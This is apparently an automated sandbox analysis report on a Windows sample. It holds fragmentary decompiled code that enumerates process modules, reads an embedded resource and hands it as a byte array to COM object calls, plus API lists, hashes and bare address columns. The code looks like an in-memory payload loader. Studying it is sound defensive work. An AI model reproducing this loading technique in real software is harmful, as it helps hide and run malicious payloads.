												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54)); // vtable slot 0 with an IID pointer: QueryInterface-style call
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												// Byte array creation: 0x11 is VT_UI1, one dimension; oleaut32 #15 is SafeArrayCreate.
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												// oleaut32 #23/#24 are SafeArrayAccessData/SafeArrayUnaccessData: the buffer is filled by E0040B350 in between.
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												// The filled SAFEARRAY is handed to vtable slot +0xb4 of the object obtained above.
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // oleaut32 #16 is SafeArrayDestroy
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0); // 0xc is VT_VARIANT with zero elements; oleaut32 #411 is SafeArrayCreateVector (empty argument array)
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4); // vtable slot +0xe4 with a VARIANT copied onto the stack
												_t538 = __imp__#9; // 0x742dcf00 (oleaut32 #9 is VariantClear)
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413); // vtable slot +8: Release-style call
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
                                                                                                                                                                                                    												if(_t415 != 0) {
                                                                                                                                                                                                    													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                                                                                                                                                    									__eflags = _t379 - _t563 + 0x178;
                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                    										_push(_t379);
                                                                                                                                                                                                    										E0040B6B5(0, _t528, _t538, __eflags);
                                                                                                                                                                                                    										_t563 = _t563 + 4;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t369 =  *(_t563 + 0x54);
                                                                                                                                                                                                    							__eflags = _t369;
                                                                                                                                                                                                    							if(_t369 != 0) {
                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t370 =  *(_t563 + 0x58);
                                                                                                                                                                                                    							__eflags = _t370;
                                                                                                                                                                                                    							if(_t370 != 0) {
                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L80;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                    						_t565 = _t557 + 8;
                                                                                                                                                                                                    						_t547 = _t428;
                                                                                                                                                                                                    						_t520 = _t565 + 0x298;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t429 =  *_t520;
                                                                                                                                                                                                    							if(_t429 !=  *_t547) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t429 == 0) {
                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                    								_t429 = 0;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                                    								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                                    									break;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t520 = _t520 + 2;
                                                                                                                                                                                                    									_t547 = _t547 + 2;
                                                                                                                                                                                                    									if(_t493 != 0) {
                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L7;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							if(_t429 != 0) {
                                                                                                                                                                                                    								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                                    								_t557 = _t565 + 8;
                                                                                                                                                                                                    								_t548 = _t431;
                                                                                                                                                                                                    								_t488 = _t557 + 0x298;
                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                    									_t432 =  *_t488;
                                                                                                                                                                                                    									__eflags = _t432 -  *_t548;
                                                                                                                                                                                                    									if(_t432 !=  *_t548) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags = _t432;
                                                                                                                                                                                                    									if(_t432 == 0) {
                                                                                                                                                                                                    										L16:
                                                                                                                                                                                                    										_t432 = 0;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                                    										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                                    										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                                    											break;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t488 = _t488 + 2;
                                                                                                                                                                                                    											_t548 = _t548 + 2;
                                                                                                                                                                                                    											__eflags = _t432;
                                                                                                                                                                                                    											if(_t432 != 0) {
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L16;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L18:
                                                                                                                                                                                                    									__eflags = _t432;
                                                                                                                                                                                                    									if(_t432 == 0) {
                                                                                                                                                                                                    										goto L10;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                    										__eflags = _t435;
                                                                                                                                                                                                    										if(_t435 != 0) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                    												_t566 = _t557 + 8;
                                                                                                                                                                                                    												_t549 = _t437;
                                                                                                                                                                                                    												_t490 = _t566 + 0x298;
                                                                                                                                                                                                    												while(1) {
                                                                                                                                                                                                    													_t438 =  *_t490;
                                                                                                                                                                                                    													__eflags = _t438 -  *_t549;
                                                                                                                                                                                                    													if(_t438 !=  *_t549) {
                                                                                                                                                                                                    														break;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t438;
                                                                                                                                                                                                    													if(_t438 == 0) {
                                                                                                                                                                                                    														L26:
                                                                                                                                                                                                    														_t438 = 0;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                    														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                    														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                    															break;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t490 = _t490 + 2;
                                                                                                                                                                                                    															_t549 = _t549 + 2;
                                                                                                                                                                                                    															__eflags = _t438;
                                                                                                                                                                                                    															if(_t438 != 0) {
                                                                                                                                                                                                    																continue;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																goto L26;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}
0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
                                                                                                                                                                                                    0x00401bdb
                                                                                                                                                                                                    0x00401be0
                                                                                                                                                                                                    0x00401be5
                                                                                                                                                                                                    0x00401bea
                                                                                                                                                                                                    0x00401bef
                                                                                                                                                                                                    0x00401bf4
                                                                                                                                                                                                    0x00401bf9
                                                                                                                                                                                                    0x00401bfe
                                                                                                                                                                                                    0x00401c03
                                                                                                                                                                                                    0x00401c08
                                                                                                                                                                                                    0x00401c0d
                                                                                                                                                                                                    0x00401c12
                                                                                                                                                                                                    0x00401c17
                                                                                                                                                                                                    0x00401c1c
                                                                                                                                                                                                    0x00401c21
                                                                                                                                                                                                    0x00401c26
                                                                                                                                                                                                    0x00401c2b
                                                                                                                                                                                                    0x00401c30
                                                                                                                                                                                                    0x00401c35
                                                                                                                                                                                                    0x00401c3a
                                                                                                                                                                                                    0x00401c3f
                                                                                                                                                                                                    0x00401c44
                                                                                                                                                                                                    0x00401c48
                                                                                                                                                                                                    0x00401c4f
                                                                                                                                                                                                    0x00401dc3
                                                                                                                                                                                                    0x00401dc4
                                                                                                                                                                                                    0x00401de0
                                                                                                                                                                                                    0x00401de2
                                                                                                                                                                                                    0x00401de7
                                                                                                                                                                                                    0x00401dec
                                                                                                                                                                                                    0x00401df1
                                                                                                                                                                                                    0x00401df6
                                                                                                                                                                                                    0x00401dfb
                                                                                                                                                                                                    0x00401e00
                                                                                                                                                                                                    0x00401e05
                                                                                                                                                                                                    0x00401e0a
                                                                                                                                                                                                    0x00401e0f
                                                                                                                                                                                                    0x00401e14
                                                                                                                                                                                                    0x00401e19
                                                                                                                                                                                                    0x00401e1e
                                                                                                                                                                                                    0x00401e23
                                                                                                                                                                                                    0x00401e28
                                                                                                                                                                                                    0x00401e2d
                                                                                                                                                                                                    0x00401e32
                                                                                                                                                                                                    0x00401e37
                                                                                                                                                                                                    0x00401e3c
                                                                                                                                                                                                    0x00401e41
                                                                                                                                                                                                    0x00401e46
                                                                                                                                                                                                    0x00401e4b
                                                                                                                                                                                                    0x00401e50
                                                                                                                                                                                                    0x00401e55
                                                                                                                                                                                                    0x00401e5a
                                                                                                                                                                                                    0x00401e5f
                                                                                                                                                                                                    0x00401e64
                                                                                                                                                                                                    0x00401e69
                                                                                                                                                                                                    0x00401e6e
                                                                                                                                                                                                    0x00401e73
                                                                                                                                                                                                    0x00401e78
                                                                                                                                                                                                    0x00401e7d
                                                                                                                                                                                                    0x00401e82
                                                                                                                                                                                                    0x00401e86
                                                                                                                                                                                                    0x00401e8b
                                                                                                                                                                                                    0x00401e96
                                                                                                                                                                                                    0x00401e9a
                                                                                                                                                                                                    0x00401ea4
                                                                                                                                                                                                    0x00401eaf
                                                                                                                                                                                                    0x00401eba
                                                                                                                                                                                                    0x00401ebf
                                                                                                                                                                                                    0x00401ec4
                                                                                                                                                                                                    0x00401ec6
                                                                                                                                                                                                    0x00401ecb
                                                                                                                                                                                                    0x00401ece
                                                                                                                                                                                                    0x00401ed2
                                                                                                                                                                                                    0x00401ed4
                                                                                                                                                                                                    0x00401eef
                                                                                                                                                                                                    0x00401ed6
                                                                                                                                                                                                    0x00401edd
                                                                                                                                                                                                    0x00401ee2
                                                                                                                                                                                                    0x00401ee6
                                                                                                                                                                                                    0x00401ee9
                                                                                                                                                                                                    0x00401ee9
                                                                                                                                                                                                    0x00401ef7
                                                                                                                                                                                                    0x00401efc
                                                                                                                                                                                                    0x00401f02
                                                                                                                                                                                                    0x00401f08
                                                                                                                                                                                                    0x00401f0c
                                                                                                                                                                                                    0x00401f15
                                                                                                                                                                                                    0x00401f18
                                                                                                                                                                                                    0x00401f1a
                                                                                                                                                                                                    0x00401f1c
                                                                                                                                                                                                    0x00401f22
                                                                                                                                                                                                    0x00401f22
                                                                                                                                                                                                    0x00401f24
                                                                                                                                                                                                    0x00401f28
                                                                                                                                                                                                    0x00401f2f
                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                    0x00401f40
                                                                                                                                                                                                    0x00401f45
                                                                                                                                                                                                    0x00401f4a
                                                                                                                                                                                                    0x00401f4b
                                                                                                                                                                                                    0x00401f50
                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                    0x00401f63
                                                                                                                                                                                                    0x00401f63
                                                                                                                                                                                                    0x00401f69
                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                    0x00401f73
                                                                                                                                                                                                    0x00401f75
                                                                                                                                                                                                    0x00401f7b
                                                                                                                                                                                                    0x00401f80
                                                                                                                                                                                                    0x00401f81
                                                                                                                                                                                                    0x00401f86
                                                                                                                                                                                                    0x00401f86
                                                                                                                                                                                                    0x00401f8c
                                                                                                                                                                                                    0x00401f8d
                                                                                                                                                                                                    0x00401f8d
                                                                                                                                                                                                    0x00401f9d
                                                                                                                                                                                                    0x00401fa2
                                                                                                                                                                                                    0x00401fa6
                                                                                                                                                                                                    0x00401fac
                                                                                                                                                                                                    0x00401faf
                                                                                                                                                                                                    0x00401fb6
                                                                                                                                                                                                    0x00401fbf
                                                                                                                                                                                                    0x00401fc4
                                                                                                                                                                                                    0x00401fc8
                                                                                                                                                                                                    0x00401fce
                                                                                                                                                                                                    0x00401fd3
                                                                                                                                                                                                    0x00401fe0
Address column of a code listing whose instruction text was not extracted (addresses 0x00401fec through 0x004023ef, a few repeated where the listing branched back).
                                                                                                                                                                                                    0x004023fe
                                                                                                                                                                                                    0x00402401
                                                                                                                                                                                                    0x00402403
                                                                                                                                                                                                    0x00402411
                                                                                                                                                                                                    0x00402417
                                                                                                                                                                                                    0x00402424
                                                                                                                                                                                                    0x00402426
                                                                                                                                                                                                    0x0040242a
                                                                                                                                                                                                    0x0040242c
                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                    0x0040243a
                                                                                                                                                                                                    0x0040243f
                                                                                                                                                                                                    0x00402443
                                                                                                                                                                                                    0x00402445
                                                                                                                                                                                                    0x0040244d
                                                                                                                                                                                                    0x0040244d
                                                                                                                                                                                                    0x00402445
                                                                                                                                                                                                    0x00402251
                                                                                                                                                                                                    0x0040223d
                                                                                                                                                                                                    0x0040244f
                                                                                                                                                                                                    0x0040245d
                                                                                                                                                                                                    0x0040245f
                                                                                                                                                                                                    0x00402461
                                                                                                                                                                                                    0x00402462
                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                    0x0040245f
                                                                                                                                                                                                    0x004021ca
                                                                                                                                                                                                    0x0040246a
                                                                                                                                                                                                    0x0040246e
                                                                                                                                                                                                    0x00402470
                                                                                                                                                                                                    0x00402478
                                                                                                                                                                                                    0x00402478
                                                                                                                                                                                                    0x0040247a
                                                                                                                                                                                                    0x0040247e
                                                                                                                                                                                                    0x00402480
                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                    0x00402480
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c55
                                                                                                                                                                                                    0x00401c62
                                                                                                                                                                                                    0x00401c67
                                                                                                                                                                                                    0x00401c6a
                                                                                                                                                                                                    0x00401c6c
                                                                                                                                                                                                    0x00401c73
                                                                                                                                                                                                    0x00401c73
                                                                                                                                                                                                    0x00401c77
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c7b
                                                                                                                                                                                                    0x00401c8f
                                                                                                                                                                                                    0x00401c8f
                                                                                                                                                                                                    0x00401c7d
                                                                                                                                                                                                    0x00401c7d
                                                                                                                                                                                                    0x00401c83
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c85
                                                                                                                                                                                                    0x00401c85
                                                                                                                                                                                                    0x00401c88
                                                                                                                                                                                                    0x00401c8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c8d
                                                                                                                                                                                                    0x00401c83
                                                                                                                                                                                                    0x00401c98
                                                                                                                                                                                                    0x00401c9a
                                                                                                                                                                                                    0x00401cbd
                                                                                                                                                                                                    0x00401cc2
                                                                                                                                                                                                    0x00401cc5
                                                                                                                                                                                                    0x00401cc7
                                                                                                                                                                                                    0x00401cd0
                                                                                                                                                                                                    0x00401cd0
                                                                                                                                                                                                    0x00401cd2
                                                                                                                                                                                                    0x00401cd4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401cd6
                                                                                                                                                                                                    0x00401cd8
                                                                                                                                                                                                    0x00401cec
                                                                                                                                                                                                    0x00401cec
                                                                                                                                                                                                    0x00401cda
                                                                                                                                                                                                    0x00401cda
                                                                                                                                                                                                    0x00401cdd
                                                                                                                                                                                                    0x00401ce0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401ce2
                                                                                                                                                                                                    0x00401ce2
                                                                                                                                                                                                    0x00401ce5
                                                                                                                                                                                                    0x00401ce8
                                                                                                                                                                                                    0x00401cea
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401cea
                                                                                                                                                                                                    0x00401ce0
                                                                                                                                                                                                    0x00401cf5
                                                                                                                                                                                                    0x00401cf5
                                                                                                                                                                                                    0x00401cf7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401cf9
                                                                                                                                                                                                    0x00401d02
                                                                                                                                                                                                    0x00401d07
                                                                                                                                                                                                    0x00401d09
                                                                                                                                                                                                    0x00401d10
                                                                                                                                                                                                    0x00401d1d
                                                                                                                                                                                                    0x00401d22
                                                                                                                                                                                                    0x00401d25
                                                                                                                                                                                                    0x00401d27
                                                                                                                                                                                                    0x00401d30
                                                                                                                                                                                                    0x00401d30
                                                                                                                                                                                                    0x00401d32
                                                                                                                                                                                                    0x00401d34
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d36
                                                                                                                                                                                                    0x00401d38
                                                                                                                                                                                                    0x00401d4c
                                                                                                                                                                                                    0x00401d4c
                                                                                                                                                                                                    0x00401d3a
                                                                                                                                                                                                    0x00401d3a
                                                                                                                                                                                                    0x00401d3d
                                                                                                                                                                                                    0x00401d40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d42
                                                                                                                                                                                                    0x00401d42
                                                                                                                                                                                                    0x00401d45
                                                                                                                                                                                                    0x00401d48
                                                                                                                                                                                                    0x00401d4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
[Disassembly listing: only the instruction address column (0x00401c4f-0x00401dbb, with 0x00000000 for rows that are not instructions) survived extraction; the instruction text is not available on this page.]

APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
• Module32Next.KERNEL32 ref: 00401D02
• Module32Next.KERNEL32 ref: 00401DB6
• FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
Strings
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
• String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPNs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
• API String ID: 2366190142-1649027716
• Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
• Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
• Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
• Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (basic blocks with address ranges, API calls inside a block, and edges; the interactive graph itself is not rendered here)
control_flow_graph 188 2460490-24604d9 193 24604e5-24604e8 188->193 194 24604db-24604dd 188->194 195 24607f3-2460874 193->195 197 24604ee-246053c 193->197 194->195 196 24604e3 194->196 196->197 206 24605ae-2460618 197->206 207 246053e-2460570 197->207 226 2460631 206->226 227 246061a-246062f 206->227 216 2460572-2460574 207->216 217 246057c-246057f 207->217 216->195 218 246057a 216->218 217->195 220 2460585-24605a8 217->220 218->220 220->206 228 2460639 226->228 230 2460644-246065a 227->230 228->230 233 2460660-2460674 230->233 234 24606fd-2460719 230->234 237 2460676-246068c 233->237 238 24606ec-24606f0 233->238 242 2460790-24607c1 234->242 243 246071b-2460726 234->243 237->234 244 246068e-246069f LdrInitializeThunk 237->244 238->233 239 24606f6 238->239 239->234 257 24607eb-24607f2 242->257 247 2460750-2460788 243->247 248 2460728-246074e 243->248 249 24606a5-24606b4 244->249 264 246078e 247->264 248->247 255 24606b6-24606e2 249->255 256 24606e4-24606e8 249->256 255->234 256->244 259 24606ea 256->259 259->234 264->257
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.363962162.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2460000_caQi43qE17.jbxd
Similarity
• API ID: InitializeThunk
• String ID: :p^
• API String ID: 2994545307-1306112509
• Opcode ID: f2e0d9a33b01cc24c83235807fea318c8cdc111c349944d205368869d578725c
• Instruction ID: 9236cdc059c2cb048eb3d7554f250c478447da81786526fedbab0bd80bedc7ac
• Opcode Fuzzy Hash: f2e0d9a33b01cc24c83235807fea318c8cdc111c349944d205368869d578725c
• Instruction Fuzzy Hash: C8B129387105108FC754DB39C998A2AB7F2FF88B14B2591A9E50ACB3B5DB31EC45CB81
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (basic blocks with address ranges, API calls inside a block, and edges; the interactive graph itself is not rendered here)
control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
C-Code - Quality: 84%
E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
	void* __ebx;
	void* __ebp;
	signed int _t12;
	void* _t21;
	int _t25;
	void* _t30;
	int _t32;
	char* _t35;

	_t21 = __edx;
	_t35 = _a4;
	_t17 = __ecx;
	if(_t35 != 0) {
		_t25 = lstrlenA(_t35) + 1;
		E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
		_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
		asm("sbb esi, esi");
		_t30 =  ~_t12 + 1;
		if(_t30 != 0) {
			_t12 = GetLastError();
			if(_t12 == 0x7a) {
				_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
				E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
				_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
				asm("sbb esi, esi");
				_t30 =  ~_t12 + 1;
			}
			if(_t30 != 0) {
				_t12 = E00401030();
			}
		}
		return _t12;
	} else {
		 *__ecx = _t35;
		return __eax;
	}
}

APIs
• lstrlenA.KERNEL32(?), ref: 00401906
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
• GetLastError.KERNEL32 ref: 00401940
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
